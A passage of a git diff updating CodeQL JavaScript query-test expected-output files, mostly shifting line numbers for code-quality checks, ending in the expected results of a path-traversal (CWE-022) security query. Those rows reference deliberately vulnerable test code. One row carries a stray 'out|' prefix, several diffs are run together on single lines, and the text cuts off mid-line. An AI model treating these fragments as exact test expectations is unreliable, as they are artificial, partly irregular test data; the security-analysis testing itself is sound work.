-| tst.js:27:1:27:9 | o.x = o.x | This expression assigns property x to itself. |
+| tst.js:4:2:4:14 | width = width | This expression assigns variable width to itself. |
+| tst.js:22:1:22:19 | array[1] = array[1] | This expression assigns element 1 to itself. |
+| tst.js:24:1:24:9 | o.x = o.x | This expression assigns property x to itself. |
diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected
index 990eaa36148f..1ce095b51938 100644
--- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected
+++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected
@@ -2,5 +2,5 @@
 | namespace.ts:23:1:23:3 | g() | Callee is not a function: it has type object. |
 | optional-chaining.js:3:5:3:7 | a() | Callee is not a function: it has type null. |
 | optional-chaining.js:7:5:7:7 | b() | Callee is not a function: it has type undefined. |
-| super.js:11:5:11:11 | super() | Callee is not a function: it has type number. |
+| super.js:10:5:10:11 | super() | Callee is not a function: it has type number. |
 | unreachable-code.js:5:9:5:11 | f() | Callee is not a function: it has type undefined. |
diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected
index 81cd1fac8fd5..82d959bca090 100644
--- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected
+++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected
@@ -1,3 +1,3 @@
 | tst.js:2:9:2:16 | x + x>>1 | Whitespace around nested operators contradicts precedence. |
 | tst.js:42:9:42:20 | p in o&&o[p] | Whitespace around nested operators contradicts precedence. |
-| tst.js:49:1:49:12 | x + x >> 1 | Whitespace around nested operators contradicts precedence. |
+| tst.js:48:1:48:12 | x + x >> 1 | Whitespace around nested operators contradicts precedence. |
diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected
index 6b028267ff76..4ed958a048a1 100644
--- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected
+++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected
@@ -1,2 +1,2 @@
-| tst.js:6:15:6:15 | y | Parameter y is not documented. |
-| tst.js:26:19:26:19 | y | Parameter y is not documented. |
+| tst.js:4:15:4:15 | y | Parameter y is not documented. |
+| tst.js:23:19:23:19 | y | Parameter y is not documented. |
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected
index bffe622dc7e0..7be415438250 100644
--- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected
+++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected
@@ -1,3 +1,3 @@
-| tst.js:2:1:2:8 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:2:14:2:20 | 'array' | array |
-| tst.js:19:9:19:16 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:23:6:23:11 | 'null' | null |
-| tst.js:33:2:33:9 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:33:16:33:22 | 'array' | array |
+| tst.js:1:1:1:8 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:1:14:1:20 | 'array' | array |
+| tst.js:18:9:18:16 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:21:6:21:11 | 'null' | null |
+| tst.js:30:2:30:9 | typeof a | The result of this 'typeof' expression is compared to $@, but the two can never be equal. | tst.js:30:16:30:22 | 'array' | array |
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected
index f3c95f56d3d2..01e87bf5c177 100644
--- a/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected
+++ b/javascript/ql/test/query-tests/LanguageFeatures/ExpressionClosures/ExpressionClosures.expected
@@ -3,4 +3,4 @@
 | letExpr.js:3:13:3:38 | let (x ... ) x + y | Use let declarations instead of let expressions. |
 | letStmt.js:3:1:5:1 | let (x ... + y);\\n} | Use let declarations instead of let statements. |
 | postfixComprehension.js:2:15:2:38 | [i*i fo ... mbers)] | Use prefix comprehensions instead of postfix comprehensions. |
-| tst.js:2:15:2:31 | function(x) x * x | Use arrow expressions instead of expression closures. |
+| tst.js:1:15:1:31 | function(x) x * x | Use arrow expressions instead of expression closures. |
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected
index 2af10be24c0d..c9b2667e9e74 100644
--- a/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected
+++ b/javascript/ql/test/query-tests/LanguageFeatures/LengthComparisonOffByOne/LengthComparisonOffByOne.expected
@@ -1,7 +1,7 @@
-| tst.js:2:17:2:32 | i <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:3:15:3:21 | args[i] | read |
-| tst.js:7:17:7:32 | args.length >= i | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:8:15:8:21 | args[i] | read |
-| tst.js:18:5:18:20 | j <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:19:15:19:21 | args[j] | read |
-| tst.js:23:5:23:20 | args.length >= j | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:24:15:24:21 | args[j] | read |
-| tst.js:34:19:34:31 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:35:9:35:12 | a[i] | read |
-| tst.js:51:9:51:21 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:51:43:51:46 | a[i] | read |
-| tst.js:51:26:51:38 | i <= b.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:51:52:51:55 | b[i] | read |
+| tst.js:1:17:1:32 | i <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:2:15:2:21 | args[i] | read |
+| tst.js:5:17:5:32 | args.length >= i | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:6:15:6:21 | args[i] | read |
+| tst.js:15:5:15:20 | j <= args.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:16:15:16:21 | args[j] | read |
+| tst.js:19:5:19:20 | args.length >= j | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:20:15:20:21 | args[j] | read |
+| tst.js:29:19:29:31 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:30:9:30:12 | a[i] | read |
+| tst.js:46:9:46:21 | i <= a.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:46:43:46:46 | a[i] | read |
+| tst.js:46:26:46:38 | i <= b.length | Off-by-one index comparison against length may lead to out-of-bounds $@. | tst.js:46:52:46:55 | b[i] | read |
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected
index 2f61724a5661..740b5e5dafe7 100644
--- a/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected
+++ b/javascript/ql/test/query-tests/LanguageFeatures/NonLinearPattern/NonLinearPattern.expected
@@ -1,11 +1,11 @@
-| NonLinearPatternTS.ts:1:34:1:39 | number | The pattern variable 'number' appears to be a type, but is a variable $@. | NonLinearPatternTS.ts:1:23:1:28 | number | previously bound |
-| ts-test.ts:3:13:3:13 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:3:10:3:10 | x | previously bound |
-| ts-test.ts:8:16:8:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:8:10:8:10 | x | previously bound |
-| ts-test.ts:11:10:11:10 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:11:7:11:7 | x | previously bound |
-| ts-test.ts:21:8:21:13 | string | The pattern variable 'string' appears to be a type, but is a variable $@. | ts-test.ts:20:8:20:13 | string | previously bound |
-| ts-test.ts:32:16:32:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:30:12:30:12 | x | previously bound |
-| ts-test.ts:34:20:34:20 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:30:12:30:12 | x | previously bound |
-| ts-test.ts:40:27:40:32 | string | Repeated binding of pattern variable 'string' $@. | ts-test.ts:40:16:40:21 | string | previously bound |
-| tst.js:3:13:3:13 | x | Repeated binding of pattern variable 'x' $@. | tst.js:3:10:3:10 | x | previously bound |
-| tst.js:8:16:8:16 | x | Repeated binding of pattern variable 'x' $@. | tst.js:8:10:8:10 | x | previously bound |
-| tst.js:11:10:11:10 | x | Repeated binding of pattern variable 'x' $@. | tst.js:11:7:11:7 | x | previously bound |
+out| NonLinearPatternTS.ts:1:34:1:39 | number | The pattern variable 'number' appears to be a type, but is a variable $@. | NonLinearPatternTS.ts:1:23:1:28 | number | previously bound |
+| ts-test.ts:2:13:2:13 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:2:10:2:10 | x | previously bound |
+| ts-test.ts:6:16:6:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:6:10:6:10 | x | previously bound |
+| ts-test.ts:8:10:8:10 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:8:7:8:7 | x | previously bound |
+| ts-test.ts:18:8:18:13 | string | The pattern variable 'string' appears to be a type, but is a variable $@. | ts-test.ts:17:8:17:13 | string | previously bound |
+| ts-test.ts:29:16:29:16 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:27:12:27:12 | x | previously bound |
+| ts-test.ts:31:20:31:20 | x | Repeated binding of pattern variable 'x' $@. | ts-test.ts:27:12:27:12 | x | previously bound |
+| ts-test.ts:37:27:37:32 | string | Repeated binding of pattern variable 'string' $@. | ts-test.ts:37:16:37:21 | string | previously bound |
+| tst.js:2:13:2:13 | x | Repeated binding of pattern variable 'x' $@. | tst.js:2:10:2:10 | x | previously bound |
+| tst.js:6:16:6:16 | x | Repeated binding of pattern variable 'x' $@. | tst.js:6:10:6:10 | x | previously bound |
+| tst.js:8:10:8:10 | x | Repeated binding of pattern variable 'x' $@. | tst.js:8:7:8:7 | x | previously bound |
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected
index 9dcd49a99d3f..75d8c23b51f6 100644
--- a/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected
+++ b/javascript/ql/test/query-tests/LanguageFeatures/PropertyWriteOnPrimitive/PropertyWriteOnPrimitive.expected
@@ -1,3 +1,3 @@
-| tst.js:2:1:2:3 | (0) | Assignment to property foo of a primitive value with type number. |
-| tst.js:11:5:11:5 | s | Assignment to a property of a primitive value with type string. |
-| tst.js:17:3:17:3 | x | Assignment to property y of a primitive value with type number or string. |
+| tst.js:1:1:1:3 | (0) | Assignment to property foo of a primitive value with type number. |
+| tst.js:8:5:8:5 | s | Assignment to a property of a primitive value with type string. |
+| tst.js:13:3:13:3 | x | Assignment to property y of a primitive value with type number or string. |
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected
index bf01936dd730..30532ee8c952 100644
--- a/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected
+++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterIgnoresParameter/SetterIgnoresParameter.expected
@@ -1,2 +1,2 @@
-| tst.js:15:3:15:12 | set x(v ... OK\\n\\t\\t} | This setter function does not use its parameter $@. | tst.js:15:9:15:9 | v | v |
-| tst.js:40:3:40:25 | set y(_ ... _x\|0; } | This setter function does not use its parameter $@. | tst.js:40:9:40:10 | _y | _y |
+| tst.js:15:3:15:12 | set x(v) {\\n\\t\\t} | This setter function does not use its parameter $@. | tst.js:15:9:15:9 | v | v |
+| tst.js:38:3:38:25 | set y(_ ... _x\|0; } | This setter function does not use its parameter $@. | tst.js:38:9:38:10 | _y | _y |
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected
index a5e92e24b4bd..2b911b330b6c 100644
--- a/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected
+++ b/javascript/ql/test/query-tests/LanguageFeatures/SetterReturn/SetterReturn.expected
@@ -1 +1 @@
-| tst.js:15:3:15:16 | return "nope"; | Useless return statement in setter function. |
+| tst.js:14:3:14:16 | return "nope"; | Useless return statement in setter function. |
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected
index 92b3fc978773..b88dd7d68e80 100644
--- a/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected
+++ b/javascript/ql/test/query-tests/LanguageFeatures/SpuriousArguments/SpuriousArguments.expected
@@ -8,17 +8,17 @@
 | reflection.js:7:15:7:18 | 1 | Superfluous arguments passed to $@. | reflection.js:1:1:1:23 | functio ... eturn;} | function f0 |
 | reflection.js:12:18:12:18 | 2 | Superfluous argument passed to $@. | reflection.js:2:1:2:24 | functio ... eturn;} | function f1 |
 | thisparameter.ts:4:11:4:12 | 45 | Superfluous argument passed to $@. | thisparameter.ts:1:1:1:45 | functio ... eturn;} | function foo |
-| tst.js:11:3:11:5 | g() | Superfluous argument passed to $@. | tst.js:1:1:4:1 | functio ... x+19;\\n} | function f |
-| tst.js:33:15:33:18 | 2 | Superfluous arguments passed to $@. | externs.js:34:1:34:27 | functio ... str) {} | function String |
-| tst.js:37:4:37:5 | 42 | Superfluous argument passed to $@. | tst.js:38:4:38:23 | function() {return;} | anonymous function |
-| tst.js:46:19:46:20 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat |
-| tst.js:70:11:70:12 | 42 | Superfluous argument passed to $@. | tst.js:49:2:51:2 | functio ... urn;\\n\\t} | function nonEmpty |
-| tst.js:75:13:75:14 | 42 | Superfluous argument passed to $@. | tst.js:63:19:63:33 | () => undefined | function emptyArrow |
-| tst.js:76:31:76:32 | 42 | Superfluous argument passed to $@. | tst.js:64:33:64:32 | () {} | default constructor of class ImplicitEmptyConstructor |
-| tst.js:77:31:77:32 | 42 | Superfluous argument passed to $@. | tst.js:67:14:68:3 | (){\\n\\t\\t} | constructor of class ExplicitEmptyConstructor |
-| tst.js:78:20:78:21 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat |
-| tst.js:114:20:114:21 | 42 | Superfluous argument passed to $@. | tst.js:82:2:86:2 | functio ... \\n\\t\\t}\\n\\t} | function notAPlainThrower1 |
-| tst.js:115:20:115:21 | 42 | Superfluous argument passed to $@. | tst.js:87:2:90:2 | functio ... .");\\n\\t} | function notAPlainThrower2 |
-| tst.js:116:20:116:21 | 42 | Superfluous argument passed to $@. | tst.js:91:2:94:2 | functio ... .");\\n\\t} | function notAPlainThrower3 |
-| tst.js:120:23:120:24 | 87 | Superfluous argument passed to $@. | tst.js:102:2:104:2 | functio ... (p);\\n\\t} | function throwerWithParam |
-| tst.js:121:18:121:19 | 42 | Superfluous argument passed to $@. | tst.js:105:2:113:2 | functio ... )();\\n\\t} | function throwerIndirect |
+| tst.js:10:3:10:5 | g() | Superfluous argument passed to $@. | tst.js:1:1:4:1 | functio ... x+19;\\n} | function f |
+| tst.js:31:15:31:18 | 2 | Superfluous arguments passed to $@. | externs.js:34:1:34:27 | functio ... str) {} | function String |
+| tst.js:34:4:34:5 | 42 | Superfluous argument passed to $@. | tst.js:35:4:35:23 | function() {return;} | anonymous function |
+| tst.js:43:19:43:20 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat |
+| tst.js:67:11:67:12 | 42 | Superfluous argument passed to $@. | tst.js:46:2:48:2 | functio ... urn;\\n\\t} | function nonEmpty |
+| tst.js:72:13:72:14 | 42 | Superfluous argument passed to $@. | tst.js:60:19:60:33 | () => undefined | function emptyArrow |
+| tst.js:73:31:73:32 | 42 | Superfluous argument passed to $@. | tst.js:61:33:61:32 | () {} | default constructor of class ImplicitEmptyConstructor |
+| tst.js:74:31:74:32 | 42 | Superfluous argument passed to $@. | tst.js:64:14:65:3 | (){\\n\\t\\t} | constructor of class ExplicitEmptyConstructor |
+| tst.js:75:20:75:21 | 10 | Superfluous argument passed to $@. | externs.js:36:1:36:27 | functio ... num) {} | function parseFloat |
+| tst.js:111:20:111:21 | 42 | Superfluous argument passed to $@. | tst.js:79:2:83:2 | functio ... \\n\\t\\t}\\n\\t} | function notAPlainThrower1 |
+| tst.js:112:20:112:21 | 42 | Superfluous argument passed to $@. | tst.js:84:2:87:2 | functio ... .");\\n\\t} | function notAPlainThrower2 |
+| tst.js:113:20:113:21 | 42 | Superfluous argument passed to $@. | tst.js:88:2:91:2 | functio ... .");\\n\\t} | function notAPlainThrower3 |
+| tst.js:117:23:117:24 | 87 | Superfluous argument passed to $@. | tst.js:99:2:101:2 | functio ... (p);\\n\\t} | function throwerWithParam |
+| tst.js:118:18:118:19 | 42 | Superfluous argument passed to $@. | tst.js:102:2:110:2 | functio ... )();\\n\\t} | function throwerIndirect |
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected
index 967ac1ce58f3..7141c9d5589e 100644
--- a/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected
+++ b/javascript/ql/test/query-tests/LanguageFeatures/StrictModeCallStackIntrospection/StrictModeCallStackIntrospection.expected
@@ -1,7 +1,7 @@
-| tst.js:5:30:5:45 | arguments.callee | Strict mode code cannot use arguments.callee. |
-| tst.js:7:21:7:36 | arguments.callee | Strict mode code cannot use arguments.callee. |
-| tst.js:9:20:9:27 | f.caller | Strict mode code cannot use Function.prototype.caller. |
-| tst.js:11:17:11:27 | f.arguments | Strict mode code cannot use Function.prototype.arguments. |
-| tst.js:18:10:18:25 | arguments.callee | Strict mode code cannot use arguments.callee. |
-| tst.js:31:12:31:21 | foo.caller | Strict mode code cannot use Function.prototype.caller. |
-| tst.js:31:12:31:21 | foo.caller | Strict mode code cannot use arguments.caller. |
+| tst.js:4:30:4:45 | arguments.callee | Strict mode code cannot use arguments.callee. |
+| tst.js:5:21:5:36 | arguments.callee | Strict mode code cannot use arguments.callee. |
+| tst.js:6:20:6:27 | f.caller | Strict mode code cannot use Function.prototype.caller. |
+| tst.js:7:17:7:27 | f.arguments | Strict mode code cannot use Function.prototype.arguments. |
+| tst.js:13:10:13:25 | arguments.callee | Strict mode code cannot use arguments.callee. |
+| tst.js:25:12:25:21 | foo.caller | Strict mode code cannot use Function.prototype.caller. |
+| tst.js:25:12:25:21 | foo.caller | Strict mode code cannot use arguments.caller. |
diff --git a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected
index 4439f2c694b6..6efbbf8544bc 100644
--- a/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected
+++ b/javascript/ql/test/query-tests/LanguageFeatures/YieldInNonGenerator/YieldInNonGenerator.expected
@@ -1 +1 @@ -| tst.js:5:9:5:21 | yield index++ | This yield expression is contained in $@ which is not marked as a generator. | tst.js:1:1:1:8 | function | function idMaker | +| tst.js:4:9:4:21 | yield index++ | This yield expression is contained in $@ which is not marked as a generator. | tst.js:1:1:1:8 | function | function idMaker | diff --git a/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected b/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected index 5718da0e961c..22e149651e78 100644 --- a/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected +++ b/javascript/ql/test/query-tests/Performance/NonLocalForIn/NonLocalForIn.expected @@ -1,5 +1,5 @@ -| tst.js:14:10:14:15 | q[i++] | This loop may prevent optimization because its iteration variable is a property. | -| tst.js:19:10:19:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | -| tst.js:24:10:24:14 | var p | This loop may prevent optimization because its iteration variable is captured. | -| tst.js:34:14:34:14 | p | This loop may prevent optimization because its iteration variable is captured. | -| tst.js:40:10:40:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | +| tst.js:13:10:13:15 | q[i++] | This loop may prevent optimization because its iteration variable is a property. | +| tst.js:17:10:17:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | +| tst.js:21:10:21:14 | var p | This loop may prevent optimization because its iteration variable is captured. | +| tst.js:30:14:30:14 | p | This loop may prevent optimization because its iteration variable is captured. | +| tst.js:35:10:35:10 | p | This loop may prevent optimization because its iteration variable is a global variable. | 
diff --git a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected index 4886857477f0..a4dd7cac42e7 100644 --- a/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected +++ b/javascript/ql/test/query-tests/Performance/ReassignParameterAndUseArguments/ReassignParameterAndUseArguments.expected @@ -1 +1 @@ -| tst.js:2:18:2:22 | start | This parameter $@, which may prevent optimization because the surrounding function uses the arguments object. | tst.js:4:9:4:13 | start | is reassigned | +| tst.js:1:18:1:22 | start | This parameter $@, which may prevent optimization because the surrounding function uses the arguments object. | tst.js:3:9:3:13 | start | is reassigned | diff --git a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected index 2210f9711682..52d3597bb637 100644 --- a/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected +++ b/javascript/ql/test/query-tests/RegExp/BackrefIntoNegativeLookahead/BackrefIntoNegativeLookahead.expected @@ -1 +1 @@ -| tst.js:4:17:4:18 | \\2 | This back reference always matches the empty string, since it refers to $@, which is contained in a $@. | tst.js:4:11:4:14 | (a+) | this capture group | tst.js:4:8:4:16 | (?!(a+)b) | negative lookahead assertion | +| tst.js:3:17:3:18 | \\2 | This back reference always matches the empty string, since it refers to $@, which is contained in a $@. | tst.js:3:11:3:14 | (a+) | this capture group | tst.js:3:8:3:16 | (?!(a+)b) | negative lookahead assertion | 
diff --git a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected index d2acad5b7659..69c471955218 100644 --- a/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected +++ b/javascript/ql/test/query-tests/RegExp/UnboundBackref/UnboundBackref.expected @@ -1,4 +1,4 @@ -| tst.js:4:2:4:3 | \\1 | There is no capture group 1 in this regular expression. | -| tst.js:8:13:8:14 | \\1 | There is no capture group 1 in this regular expression. | -| tst.js:15:16:15:17 | \\2 | There is no capture group 2 in this regular expression. | -| tst.js:16:16:16:29 | \\k | There is no capture group named 'whitespace' in this regular expression. | +| tst.js:3:2:3:3 | \\1 | There is no capture group 1 in this regular expression. | +| tst.js:6:13:6:14 | \\1 | There is no capture group 1 in this regular expression. | +| tst.js:12:16:12:17 | \\2 | There is no capture group 2 in this regular expression. | +| tst.js:13:16:13:29 | \\k | There is no capture group named 'whitespace' in this regular expression. | diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected index 2b0eaa5e3a03..d9382b86a625 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableCaret/UnmatchableCaret.expected @@ -1,3 +1,3 @@ -| tst.js:2:4:2:4 | ^ | This assertion can never match. | -| tst.js:11:5:11:5 | ^ | This assertion can never match. | -| tst.js:20:5:20:5 | ^ | This assertion can never match. | +| tst.js:1:4:1:4 | ^ | This assertion can never match. | +| tst.js:9:5:9:5 | ^ | This assertion can never match. | +| tst.js:16:5:16:5 | ^ | This assertion can never match. | 
diff --git a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected index 6e57f22c18a7..a380a81c2744 100644 --- a/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected +++ b/javascript/ql/test/query-tests/RegExp/UnmatchableDollar/UnmatchableDollar.expected @@ -1,4 +1,4 @@ -| tst.js:2:10:2:10 | $ | This assertion can never match. | -| tst.js:11:3:11:3 | $ | This assertion can never match. | -| tst.js:20:3:20:3 | $ | This assertion can never match. | -| tst.js:38:6:38:6 | $ | This assertion can never match. | +| tst.js:1:10:1:10 | $ | This assertion can never match. | +| tst.js:9:3:9:3 | $ | This assertion can never match. | +| tst.js:16:3:16:3 | $ | This assertion can never match. | +| tst.js:33:6:33:6 | $ | This assertion can never match. | diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected index 8f1786508a59..bfb374411b6a 100644 --- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected +++ b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/TaintedPath.expected 
@@ -4,159 +4,159 @@ nodes | TaintedPath-es6.js:7:14:7:39 | parse(r ... ).query | semmle.label | parse(r ... ).query | | TaintedPath-es6.js:7:14:7:44 | parse(r ... ry.path | semmle.label | parse(r ... ry.path | | TaintedPath-es6.js:7:20:7:26 | req.url | semmle.label | req.url | -| TaintedPath-es6.js:10:26:10:45 | join("public", path) | semmle.label | join("public", path) | -| TaintedPath-es6.js:10:41:10:44 | path | semmle.label | path | +| TaintedPath-es6.js:9:26:9:45 | join("public", path) | semmle.label | join("public", path) | +| TaintedPath-es6.js:9:41:9:44 | path | semmle.label | path | | TaintedPath.js:9:7:9:48 | path | semmle.label | path | | TaintedPath.js:9:14:9:37 | url.par ... , true) | semmle.label | url.par ... , true) | | TaintedPath.js:9:14:9:43 | url.par ... ).query | semmle.label | url.par ... ).query | | TaintedPath.js:9:14:9:48 | url.par ... ry.path | semmle.label | url.par ... ry.path | | TaintedPath.js:9:24:9:30 | req.url | semmle.label | req.url | -| TaintedPath.js:12:29:12:32 | path | semmle.label | path | -| TaintedPath.js:15:29:15:48 | "/home/user/" + path | semmle.label | "/home/user/" + path | -| TaintedPath.js:15:45:15:48 | path | semmle.label | path | -| TaintedPath.js:18:33:18:36 | path | semmle.label | path | -| TaintedPath.js:21:33:21:36 | path | semmle.label | path | -| TaintedPath.js:24:33:24:36 | path | semmle.label | path | -| TaintedPath.js:33:31:33:34 | path | semmle.label | path | -| TaintedPath.js:38:3:38:44 | path | semmle.label | path | -| TaintedPath.js:38:10:38:33 | url.par ... , true) | semmle.label | url.par ... , true) | -| TaintedPath.js:38:10:38:39 | url.par ... ).query | semmle.label | url.par ... ).query | -| TaintedPath.js:38:10:38:44 | url.par ... ry.path | semmle.label | url.par ... ry.path | -| TaintedPath.js:38:20:38:26 | req.url | semmle.label | req.url | -| TaintedPath.js:42:29:42:52 | pathMod ... e(path) | semmle.label | pathMod ... 
e(path) | -| TaintedPath.js:42:48:42:51 | path | semmle.label | path | -| TaintedPath.js:46:29:46:49 | pathMod ... n(path) | semmle.label | pathMod ... n(path) | -| TaintedPath.js:46:45:46:48 | path | semmle.label | path | -| TaintedPath.js:48:29:48:58 | pathMod ... ath, z) | semmle.label | pathMod ... ath, z) | -| TaintedPath.js:48:51:48:54 | path | semmle.label | path | -| TaintedPath.js:50:29:50:54 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:50:50:50:53 | path | semmle.label | path | -| TaintedPath.js:52:29:52:56 | pathMod ... , path) | semmle.label | pathMod ... , path) | -| TaintedPath.js:52:52:52:55 | path | semmle.label | path | -| TaintedPath.js:54:29:54:56 | pathMod ... ath, x) | semmle.label | pathMod ... ath, x) | -| TaintedPath.js:54:49:54:52 | path | semmle.label | path | -| TaintedPath.js:56:29:56:52 | pathMod ... e(path) | semmle.label | pathMod ... e(path) | -| TaintedPath.js:56:48:56:51 | path | semmle.label | path | -| TaintedPath.js:58:29:58:61 